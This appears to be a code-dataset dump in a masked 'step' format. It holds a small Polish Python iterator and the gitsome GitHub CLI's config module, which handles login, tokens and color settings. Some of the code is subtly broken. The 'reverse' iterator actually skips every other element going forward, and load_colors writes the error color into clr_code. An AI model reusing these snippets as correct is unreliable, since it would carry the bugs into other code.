{ "blob_id": "ea1d62c4a8c406dde9bb138ee045be5e682fdbfe", "index": 566, "step-1": "class Wspak:\n <mask token>\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\n", "step-3": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\nfor x in Wspak(g):\n print(x)\nprint(d)\n", "step-4": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\nd = ['sdasda', 'sdasdasd', 'sdsad232', 'dasda', 'dsada']\ng = 2, 3, 4, 6, 7\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)\n", "step-5": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i=len(data)-1\n\n def __iter__(self):\n return self\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index+2\n return self.data[self.index]\nd=([\"sdasda\",\"sdasdasd\",\"sdsad232\",\"dasda\",\"dsada\"])\ng=(2,3,4,6,7)\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)", "step-ids": [ 2, 5, 6, 7, 8 ] }
[ 2, 5, 6, 7, 8 ]
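Tracing the Wspak record above with its hard-coded inputs: the index starts at -2 and advances by 2, so elements at indices 0, 2, 4 are yielded before index >= len(data) - 1 stops iteration. Expected output of the script:

2
4
7
['sdasda', 'sdsad232', 'dsada']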
# -*- coding: utf-8 -*- # Copyright 2015 Donne Martin. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. from __future__ import unicode_literals from __future__ import print_function import click from getpass import getpass import os import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from .compat import configparser from .lib.github3 import authorize, enterprise_login, login from .lib.github3.exceptions import AuthenticationFailed, UnprocessableEntity class Config(object): """Gitsome config. :type api: :class:`github3.github.Github` :param api: An instance of github3.github.Github. :type clr_x: str :param clr_x: Various ansi color config colors to use for highlights. :type CONFIG: str :param CONFIG: The config file name. :type CONFIG_SECTION: str :param CONFIG_SECTION: The main config file section label. :type CONFIG_CLR_X: str :param CONFIG_CLR_X: Various ansi color config labels to use for highlights. :type CONFIG_ENTERPRISE_URL: str :param CONFIG_ENTERPRISE_URL: The GitHub Enterprise url. :type CONFIG_USER_LOGIN: str :param CONFIG_USER_LOGIN: The user login. :type CONFIG_USER_PASS: str :param CONFIG_USER_PASS: The user password. :type CONFIG_USER_TOKEN: str :param CONFIG_USER_TOKEN: The user token. :type CONFIG_USER_FEED: str :param CONFIG_USER_FEED: The user feed config. This is the feed on https://github.com/ when logged in and requires the basic auth model, which doesn't work when logging in with tokens or 2FA. This config listed the pre-signed url to access the feed. :type CONFIG_URL: str :param CONFIG_URL: The config file name that contains urls used in the `gh view` command. :type CONFIG_URL_SECTION: str :param CONFIG_URL_SECTION: The config file section that contains urls used in the `gh view [url_index]` command. :type CONFIG_URL_LIST: str :param CONFIG_URL_LIST: The config containing a list of the last set of urls the user has seen, which allows the user to quickly access a repo url with the `gh view [url_index]` command. :type CONFIG_VERIFY_SSL: str :param CONFIG_VERIFY_SSL: Determines whether to verify SSL certs. :type enterprise_url: str :param enterprise_url: The GitHub Enterprise url. :type urls: list :param urls: The last set of urls the user has seen, which allows the user to quickly access a repo url with the gh view [url_index] command. :type user_login: str :param user_login: The user's login in ~/.gitsomeconfig. :type user_pass: str :param user_pass: The user's pass in ~/.gitsomeconfig. This is only stored for GitHub Enterprise users since using only a personal access token does not seem to be supported. :type user_token: str :param user_token: The user's token in ~/.gitsomeconfig. :type verify_ssl: bool :param verify_ssl: Determines whether to verify SSL certs. 
""" CONFIG = '.gitsomeconfig' CONFIG_CLR_PRIMARY = 'clr_primary' CONFIG_CLR_SECONDARY = 'clr_secondary' CONFIG_CLR_TERTIARY = 'clr_tertiary' CONFIG_CLR_QUATERNARY = 'clr_quaternary' CONFIG_CLR_BOLD = 'clr_bold' CONFIG_CLR_CODE = 'clr_code' CONFIG_CLR_ERROR = 'clr_error' CONFIG_CLR_HEADER = 'clr_header' CONFIG_CLR_LINK = 'clr_link' CONFIG_CLR_LIST = 'clr_list' CONFIG_CLR_MESSAGE = 'clr_message' CONFIG_CLR_NUM_COMMENTS = 'clr_num_comments' CONFIG_CLR_NUM_POINTS = 'clr_num_points' CONFIG_CLR_TAG = 'clr_tag' CONFIG_CLR_TIME = 'clr_time' CONFIG_CLR_TITLE = 'clr_title' CONFIG_CLR_TOOLTIP = 'clr_tooltip' CONFIG_CLR_USER = 'clr_user' CONFIG_CLR_VIEW_LINK = 'clr_view_link' CONFIG_CLR_VIEW_INDEX = 'clr_view_index' CONFIG_SECTION = 'github' CONFIG_USER_LOGIN = 'user_login' CONFIG_USER_PASS = 'user_pass' CONFIG_USER_TOKEN = 'user_token' CONFIG_USER_FEED = 'user_feed' CONFIG_ENTERPRISE_URL = 'enterprise_url' CONFIG_VERIFY_SSL = 'verify_ssl' CONFIG_URL = '.gitsomeconfigurl' CONFIG_URL_SECTION = 'url' CONFIG_URL_LIST = 'url_list' CONFIG_AVATAR = '.gitsomeconfigavatar.png' def __init__(self): self.api = None self.user_login = None self.user_pass = None self.user_token = None self.user_feed = None self.enterprise_url = None self.verify_ssl = True self.urls = [] self._init_colors() self.load_configs([ self.load_config_colors, ]) self.login = login self.authorize = authorize self.getpass = getpass def _init_colors(self): """Initialize colors to their defaults.""" self.clr_primary = None self.clr_secondary = 'green' self.clr_tertiary = 'cyan' self.clr_quaternary = 'yellow' self.clr_bold = 'cyan' self.clr_code = 'cyan' self.clr_error = 'red' self.clr_header = 'yellow' self.clr_link = 'green' self.clr_list = 'cyan' self.clr_message = None self.clr_num_comments = 'green' self.clr_num_points = 'green' self.clr_tag = 'cyan' self.clr_time = 'yellow' self.clr_title = None self.clr_tooltip = None self.clr_user = 'cyan' self.clr_view_link = 'magenta' self.clr_view_index = 'magenta' def authenticate_cached_credentials(self, config, parser, enterprise_auth=enterprise_login): """Authenticate with the user's credentials in ~/.gitsomeconfig. :type config: str :param config: The config path. :type parser: :class:`ConfigParser.RawConfigParser` :param parser: An instance of `ConfigParser.RawConfigParser. """ with open(config) as config_file: try: parser.read_file(config_file) except AttributeError: parser.readfp(config_file) self.user_login = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_LOGIN) self.user_pass = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_PASS) self.user_token = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_TOKEN) self.enterprise_url = self.load_config( parser=parser, cfg_label=self.CONFIG_ENTERPRISE_URL) self.verify_ssl = self.load_config( parser=parser, cfg_label=self.CONFIG_VERIFY_SSL, boolean_config=True) self.user_feed = self.load_config( parser=parser, cfg_label=self.CONFIG_USER_FEED) if not self.verify_ssl: # The user has chosen not to verify SSL certs. # Disable warnings related to this option. 
            requests.packages.urllib3.disable_warnings(
                InsecureRequestWarning)
        login_kwargs = {
            'username': self.user_login,
            'two_factor_callback': self.request_two_factor_code,
        }
        if self.enterprise_url is not None:
            self.login = enterprise_auth
            login_kwargs.update({
                'url': self.enterprise_url,
                'verify': self.verify_ssl,
            })
            if self.user_token is not None:
                login_kwargs.update({'token': self.user_token})
            elif self.user_pass is not None:
                login_kwargs.update({'password': self.user_pass})
            else:
                self.print_auth_error()
                return
        else:
            login_kwargs.update({'token': self.user_token})
        self.api = self.login(**login_kwargs)

    def authenticate(self, enterprise=False,
                     enterprise_auth=enterprise_login, overwrite=False):
        """Log into GitHub.

        Adapted from https://github.com/sigmavirus24/github-cli.

        :type enterprise: bool
        :param enterprise: Determines whether to configure GitHub Enterprise.
            Default: False.

        :type overwrite: bool
        :param overwrite: indicates whether we want to overwrite the current
            set of credentials. Default: False.
        """
        if self.api is not None and not overwrite:
            return
        # Get the full path to the configuration file.
        config = self.get_github_config_path(self.CONFIG)
        parser = configparser.RawConfigParser()
        # Check to make sure the file exists and we are allowed to read it.
        # Skip if we want to overwrite the auth settings.
        if os.path.isfile(config) and \
                os.access(config, os.R_OK | os.W_OK) and \
                not overwrite:
            with open(config) as config_file:
                try:
                    parser.read_file(config_file)
                except AttributeError:
                    parser.readfp(config_file)
                self.authenticate_cached_credentials(config, parser)
        else:
            # The file didn't exist or we don't have the correct permissions.
            login_kwargs = {
                'two_factor_callback': self.request_two_factor_code,
            }
            if enterprise:
                self.login = enterprise_auth
                while not self.enterprise_url:
                    self.enterprise_url = input('Enterprise URL: ')
                if click.confirm('Do you want to verify SSL certs?',
                                 default=True):
                    self.verify_ssl = True
                else:
                    self.verify_ssl = False
                login_kwargs.update({
                    'url': self.enterprise_url,
                    'verify': self.verify_ssl,
                })
            while not self.user_login:
                self.user_login = input('User Login: ')
            login_kwargs.update({'username': self.user_login})
            if click.confirm(('Do you want to log in with a password [Y] or '
                              'a personal access token [n]?'),
                             default=True):
                user_pass = None
                while not user_pass:
                    user_pass = self.getpass('Password: ')
                login_kwargs.update({'password': user_pass})
                try:
                    if not enterprise:
                        # Trade the user password for a personal access token.
                        # This does not seem to be available for Enterprise.
                        auth = self.authorize(
                            self.user_login,
                            user_pass,
                            scopes=['user', 'repo'],
                            note='gitsome',
                            note_url='https://github.com/donnemartin/gitsome',
                            two_factor_callback=self.request_two_factor_code
                        )
                        self.user_token = auth.token
                    else:
                        self.user_pass = user_pass
                except (UnprocessableEntity, AuthenticationFailed):
                    click.secho('Error creating token.', fg=self.clr_error)
                    click.secho(('Visit the following page and verify you do '
                                 'not have an existing token named "gitsome":\n'
                                 '  https://github.com/settings/tokens\n'
                                 'If a token already exists, update your '
                                 '~/.gitsomeconfig file with your token:\n'
                                 '  user_token = TOKEN\n'
                                 'You can also generate a new token.'),
                                fg=self.clr_message)
                    self.print_auth_error()
                    return
            else:
                # The user has chosen to authenticate with a token.
                while not self.user_token:
                    self.user_token = input('Token: ')
                login_kwargs.update({'token': self.user_token})
            self.api = self.login(**login_kwargs)
            if self.user_feed:
                parser.set(self.CONFIG_SECTION,
                           self.CONFIG_USER_FEED,
                           self.user_feed)

    def check_auth(self):
        """Check if the current authorization is valid.

        This method uses the ratelimit_remaining api to check whether
        the currently authenticated user's credentials are valid without
        deducting from the rate limit. The ratelimit_remaining api does not
        seem to be available for GitHub Enterprise.

        github3.py's method check_authorization seems to only work given
        an authorization created by a registered application.

        TODO: Determine a better way to check the authorization for
        GitHub Enterprise.

        :type enterprise: bool
        :param enterprise: Determines whether we are authenticating with
            GitHub Enterprise.
        """
        if self.enterprise_url is not None:
            return True
        try:
            if self.api is not None:
                # Throws AuthenticationFailed if invalid credentials but
                # does not deduct from the rate limit.
                self.api.ratelimit_remaining
                return True
            else:
                self.print_auth_error()
        except AuthenticationFailed:
            self.print_auth_error()
        return False

    def get_github_config_path(self, config_file_name):
        """Attempt to find the github config file.

        Adapted from https://github.com/sigmavirus24/github-cli.

        :type config_file_name: str
        :param config_file_name: The config file name.

        :rtype: str
        :return: The github config file path.
        """
        home = os.path.abspath(os.environ.get('HOME', ''))
        config_file_path = os.path.join(home, config_file_name)
        return config_file_path

    def load_config(self, parser, cfg_label, default=None,
                    color_config=False, boolean_config=False):
        """Load the specified config from ~/.gitsomeconfig.

        :type parser: :class:`ConfigParser.RawConfigParser`
        :param parser: An instance of `ConfigParser.RawConfigParser`.

        :type cfg_label: str
        :param cfg_label: The config label to load.

        :type default: str
        :param default: The default color if no color config exists.
            Default: None.

        :type color_config: bool
        :param color_config: Determines whether this is a color config.
            Default: False.

        :type boolean_config: bool
        :param boolean_config: Determines whether to load a boolean config.
            Default: False.
        """
        try:
            if boolean_config:
                cfg = parser.getboolean(self.CONFIG_SECTION, cfg_label)
            else:
                cfg = parser.get(self.CONFIG_SECTION, cfg_label)
                if color_config:
                    if cfg == 'none':
                        cfg = None
                    # Check if the user input a valid color.
                    # If invalid, this will throw a TypeError
                    click.style('', fg=cfg)
        except (TypeError, configparser.NoOptionError):
            return default
        return cfg

    def load_configs(self, config_funcs):
        """Load the specified config from ~/.gitsomeconfig.

        :type config_funcs: list
        :param config_funcs: The config methods to run.
        """
        config_file_path = self.get_github_config_path(self.CONFIG)
        parser = configparser.RawConfigParser()
        try:
            with open(config_file_path) as config_file:
                try:
                    parser.read_file(config_file)
                except AttributeError:
                    parser.readfp(config_file)
                for config_func in config_funcs:
                    config_func(parser)
        except IOError:
            # There might not be a cache yet, just silently return.
            return None

    def load_config_colors(self, parser):
        """Load the color config from ~/.gitsomeconfig.

        :type parser: :class:`ConfigParser.RawConfigParser`
        :param parser: An instance of `ConfigParser.RawConfigParser`.
        """
        self.load_colors(parser)

    def load_colors(self, parser):
        """Load all colors from ~/.gitsomeconfig.

        :type parser: :class:`ConfigParser.RawConfigParser`
        :param parser: An instance of `ConfigParser.RawConfigParser`.
""" self.clr_primary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_PRIMARY, default=self.clr_primary, color_config=True) self.clr_secondary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_SECONDARY, default=self.clr_secondary, color_config=True) self.clr_tertiary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TERTIARY, default=self.clr_tertiary, color_config=True) self.clr_quaternary = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_QUATERNARY, default=self.clr_quaternary, color_config=True) self.clr_bold = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_BOLD, default=self.clr_bold, color_config=True) self.clr_code = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_CODE, default=self.clr_code, color_config=True) self.clr_code = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_ERROR, default=self.clr_code, color_config=True) self.clr_header = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_HEADER, default=self.clr_header, color_config=True) self.clr_link = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_LINK, default=self.clr_link, color_config=True) self.clr_list = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_LIST, default=self.clr_list, color_config=True) self.clr_message = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_MESSAGE, default=self.clr_message, color_config=True) self.clr_num_comments = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_NUM_COMMENTS, default=self.clr_num_comments, color_config=True) self.clr_num_points = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_NUM_POINTS, default=self.clr_num_points, color_config=True) self.clr_tag = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TAG, default=self.clr_tag, color_config=True) self.clr_time = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TIME, default=self.clr_time, color_config=True) self.clr_title = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TITLE, default=self.clr_title, color_config=True) self.clr_tooltip = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_TOOLTIP, default=self.clr_tooltip, color_config=True) self.clr_user = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_USER, default=self.clr_user, color_config=True) self.clr_view_link = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_VIEW_LINK, default=self.clr_view_link, color_config=True) self.clr_view_index = self.load_config( parser=parser, cfg_label=self.CONFIG_CLR_VIEW_INDEX, default=self.clr_view_index, color_config=True) def load_urls(self, view_in_browser): """Load the current set of urls from ~/.gitsomeconfigurl. :type view_in_browser: bool :param view_in_browser: Determines whether to view the urls in a browser. :rtype: list :return: Collection of urls. 
""" config = self.get_github_config_path(self.CONFIG_URL) parser = configparser.RawConfigParser() with open(config) as config_file: try: parser.read_file(config_file) except AttributeError: parser.readfp(config_file) urls = parser.get(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST) urls = urls.strip() excludes = ['[', ']', "'"] for exclude in excludes: urls = urls.replace(exclude, '') if not view_in_browser: urls = urls.replace('https://github.com/', '') return urls.split(', ') def print_auth_error(self): """Print a message the authorization has failed.""" click.secho('Authentication error.', fg=self.clr_error) click.secho(('Update your credentials in ~/.gitsomeconfig ' 'or run:\n gh configure'), fg=self.clr_message) def prompt_news_feed(self): """Prompt the user to enter a news feed url.""" if click.confirm(('No feed url detected.\n Calling gh events without ' "an argument\n displays the logged in user's " 'news feed.\nDo you want gitsome to track your ' 'news feed?'), default=True): click.secho(('Visit the following url while logged into GitHub:\n' ' https://github.com\n' 'Enter the url found under "Subscribe to your ' 'news feed".'), fg=self.clr_message) self.user_feed = '' while not self.user_feed: self.user_feed = input('URL: ') def request_two_factor_code(self): """Request two factor authentication code. Callback if two factor authentication is requested. :rtype: str :return: The user input two factor authentication code. """ code = '' while not code: code = input('Enter 2FA code: ') return code def save_config(self): """Saves the config to ~/.gitsomeconfig.""" if self.check_auth(): config = self.get_github_config_path(self.CONFIG) parser = configparser.RawConfigParser() parser.add_section(self.CONFIG_SECTION) parser.set(self.CONFIG_SECTION, self.CONFIG_USER_LOGIN, self.user_login) if self.user_token is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_TOKEN, self.user_token) if self.user_feed is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self.user_feed) if self.enterprise_url is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_ENTERPRISE_URL, self.enterprise_url) if self.user_pass is not None: parser.set(self.CONFIG_SECTION, self.CONFIG_USER_PASS, self.user_pass) else: parser.remove_option(self.CONFIG_SECTION, self.CONFIG_USER_PASS) parser.set(self.CONFIG_SECTION, self.CONFIG_VERIFY_SSL, self.verify_ssl) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_PRIMARY, self.clr_primary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_SECONDARY, self.clr_secondary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TERTIARY, self.clr_tertiary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_QUATERNARY, self.clr_quaternary) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_BOLD, self.clr_bold) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_CODE, self.clr_code) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_ERROR, self.clr_error) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_HEADER, self.clr_header) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LINK, self.clr_link) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LIST, self.clr_list) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_MESSAGE, self.clr_message) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_COMMENTS, self.clr_num_comments) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_POINTS, self.clr_num_points) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TAG, self.clr_tag) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TIME, self.clr_time) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TITLE, 
self.clr_title) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TOOLTIP, self.clr_tooltip) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_USER, self.clr_user) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_LINK, self.clr_view_link) parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_INDEX, self.clr_view_index) with open(config, 'w+') as config_file: parser.write(config_file) def save_urls(self): """Save the current set of urls to ~/.gitsomeconfigurl.""" config = self.get_github_config_path(self.CONFIG_URL) parser = configparser.RawConfigParser() try: parser.add_section(self.CONFIG_URL_SECTION) except configparser.DuplicateSectionError: pass parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls) with open(config, 'w+') as config_file: parser.write(config_file) def show_bash_completions_info(self): """Show info on how to enable bash completions""" click.secho(('By default, gitsome looks at the following locations ' 'to enable bash completions:\n' ' https://github.com/donnemartin/gitsome/blob/master/xonsh/environ.py#L123-L130\n' # NOQA 'If bash completions are not working for you, check out ' 'the following link:\n' ' https://github.com/donnemartin/gitsome#enabling-bash-completions'), # NOQA fg=self.clr_message)
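To close out the Config row, a hedged sketch of a typical session; ratelimit_remaining is the same check the class itself performs in check_auth, and everything else follows the methods defined above:

# Hypothetical session: load or prompt for credentials, verify, persist.
config = Config()
config.authenticate()          # reads ~/.gitsomeconfig, or prompts interactively
if config.check_auth():
    print('Requests left this hour:', config.api.ratelimit_remaining)
    config.save_config()       # writes credentials and color settings back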
normal
{ "blob_id": "a649139a600cb506056a20e00089a07ec9244394", "index": 858, "step-1": "<mask token>\n\n\nclass Config(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _init_colors(self):\n \"\"\"Initialize colors to their defaults.\"\"\"\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'\n <mask token>\n\n def authenticate(self, enterprise=False, enterprise_auth=\n enterprise_login, overwrite=False):\n \"\"\"Log into GitHub.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type enterprise: bool\n :param enterprise: Determines whether to configure GitHub Enterprise.\n Default: False.\n\n :type overwrite: bool\n :param overwrite: indicates whether we cant to overwrite the current\n set of credentials. Default: False.\n \"\"\"\n if self.api is not None and not overwrite:\n return\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK\n ) and not overwrite:\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.authenticate_cached_credentials(config, parser)\n else:\n login_kwargs = {'two_factor_callback': self.request_two_factor_code\n }\n if enterprise:\n self.login = enterprise_auth\n while not self.enterprise_url:\n self.enterprise_url = input('Enterprise URL: ')\n if click.confirm('Do you want to verify SSL certs?',\n default=True):\n self.verify_ssl = True\n else:\n self.verify_ssl = False\n login_kwargs.update({'url': self.enterprise_url, 'verify':\n self.verify_ssl})\n while not self.user_login:\n self.user_login = input('User Login: ')\n login_kwargs.update({'username': self.user_login})\n if click.confirm(\n 'Do you want to log in with a password [Y] or a personal access token [n]?'\n , default=True):\n user_pass = None\n while not user_pass:\n user_pass = self.getpass('Password: ')\n login_kwargs.update({'password': user_pass})\n try:\n if not enterprise:\n auth = self.authorize(self.user_login, user_pass,\n scopes=['user', 'repo'], note='gitsome',\n note_url=\n 'https://github.com/donnemartin/gitsome',\n two_factor_callback=self.request_two_factor_code)\n self.user_token = auth.token\n else:\n self.user_pass = user_pass\n except (UnprocessableEntity, AuthenticationFailed):\n click.secho('Error creating token.', fg=self.clr_error)\n click.secho(\n \"\"\"Visit the following page and verify you do not have an existing token named \"gitsome\":\n https://github.com/settings/tokens\nIf a token already exists, update your 
# -*- coding: utf-8 -*-

# Copyright 2015 Donne Martin. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.

from __future__ import unicode_literals
from __future__ import print_function

import click
from getpass import getpass
import os
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

from .compat import configparser
from .lib.github3 import authorize, enterprise_login, login
from .lib.github3.exceptions import AuthenticationFailed, UnprocessableEntity


class Config(object):
    """Gitsome config.

    :type api: :class:`github3.github.Github`
    :param api: An instance of github3.github.Github.

    :type clr_x: str
    :param clr_x: Various ansi color config colors to use for highlights.

    :type CONFIG: str
    :param CONFIG: The config file name.

    :type CONFIG_SECTION: str
    :param CONFIG_SECTION: The main config file section label.

    :type CONFIG_CLR_X: str
    :param CONFIG_CLR_X: Various ansi color config labels to use for
        highlights.

    :type CONFIG_ENTERPRISE_URL: str
    :param CONFIG_ENTERPRISE_URL: The GitHub Enterprise url.

    :type CONFIG_USER_LOGIN: str
    :param CONFIG_USER_LOGIN: The user login.

    :type CONFIG_USER_PASS: str
    :param CONFIG_USER_PASS: The user password.

    :type CONFIG_USER_TOKEN: str
    :param CONFIG_USER_TOKEN: The user token.

    :type CONFIG_USER_FEED: str
    :param CONFIG_USER_FEED: The user feed config.  This is the feed on
        https://github.com/ when logged in and requires the basic auth model,
        which doesn't work when logging in with tokens or 2FA.  This config
        lists the pre-signed url to access the feed.

    :type CONFIG_URL: str
    :param CONFIG_URL: The config file name that contains urls used in the
        `gh view` command.

    :type CONFIG_URL_SECTION: str
    :param CONFIG_URL_SECTION: The config file section that contains urls used
        in the `gh view [url_index]` command.

    :type CONFIG_URL_LIST: str
    :param CONFIG_URL_LIST: The config containing a list of the last set of
        urls the user has seen, which allows the user to quickly access a repo
        url with the `gh view [url_index]` command.

    :type CONFIG_VERIFY_SSL: str
    :param CONFIG_VERIFY_SSL: Determines whether to verify SSL certs.

    :type enterprise_url: str
    :param enterprise_url: The GitHub Enterprise url.

    :type urls: list
    :param urls: The last set of urls the user has seen, which allows the user
        to quickly access a repo url with the `gh view [url_index]` command.

    :type user_login: str
    :param user_login: The user's login in ~/.gitsomeconfig.

    :type user_pass: str
    :param user_pass: The user's password in ~/.gitsomeconfig.
        This is only stored for GitHub Enterprise users since using only a
        personal access token does not seem to be supported.

    :type user_token: str
    :param user_token: The user's token in ~/.gitsomeconfig.

    :type verify_ssl: bool
    :param verify_ssl: Determines whether to verify SSL certs.
    """
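
    # For orientation, a minimal ~/.gitsomeconfig written by save_config()
    # might look like the INI sketch below; the section and key names come
    # from the constants that follow, while the values are illustrative
    # assumptions:
    #
    #   [github]
    #   user_login = octocat
    #   user_token = <personal access token>
    #   verify_ssl = True
    #   clr_primary = none
    #   clr_secondary = green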

    CONFIG = '.gitsomeconfig'
    CONFIG_CLR_PRIMARY = 'clr_primary'
    CONFIG_CLR_SECONDARY = 'clr_secondary'
    CONFIG_CLR_TERTIARY = 'clr_tertiary'
    CONFIG_CLR_QUATERNARY = 'clr_quaternary'
    CONFIG_CLR_BOLD = 'clr_bold'
    CONFIG_CLR_CODE = 'clr_code'
    CONFIG_CLR_ERROR = 'clr_error'
    CONFIG_CLR_HEADER = 'clr_header'
    CONFIG_CLR_LINK = 'clr_link'
    CONFIG_CLR_LIST = 'clr_list'
    CONFIG_CLR_MESSAGE = 'clr_message'
    CONFIG_CLR_NUM_COMMENTS = 'clr_num_comments'
    CONFIG_CLR_NUM_POINTS = 'clr_num_points'
    CONFIG_CLR_TAG = 'clr_tag'
    CONFIG_CLR_TIME = 'clr_time'
    CONFIG_CLR_TITLE = 'clr_title'
    CONFIG_CLR_TOOLTIP = 'clr_tooltip'
    CONFIG_CLR_USER = 'clr_user'
    CONFIG_CLR_VIEW_LINK = 'clr_view_link'
    CONFIG_CLR_VIEW_INDEX = 'clr_view_index'
    CONFIG_SECTION = 'github'
    CONFIG_USER_LOGIN = 'user_login'
    CONFIG_USER_PASS = 'user_pass'
    CONFIG_USER_TOKEN = 'user_token'
    CONFIG_USER_FEED = 'user_feed'
    CONFIG_ENTERPRISE_URL = 'enterprise_url'
    CONFIG_VERIFY_SSL = 'verify_ssl'
    CONFIG_URL = '.gitsomeconfigurl'
    CONFIG_URL_SECTION = 'url'
    CONFIG_URL_LIST = 'url_list'
    CONFIG_AVATAR = '.gitsomeconfigavatar.png'

    def __init__(self):
        self.api = None
        self.user_login = None
        self.user_pass = None
        self.user_token = None
        self.user_feed = None
        self.enterprise_url = None
        self.verify_ssl = True
        self.urls = []
        self._init_colors()
        self.load_configs([
            self.load_config_colors,
        ])
        self.login = login
        self.authorize = authorize
        self.getpass = getpass

    def _init_colors(self):
        """Initialize colors to their defaults."""
        self.clr_primary = None
        self.clr_secondary = 'green'
        self.clr_tertiary = 'cyan'
        self.clr_quaternary = 'yellow'
        self.clr_bold = 'cyan'
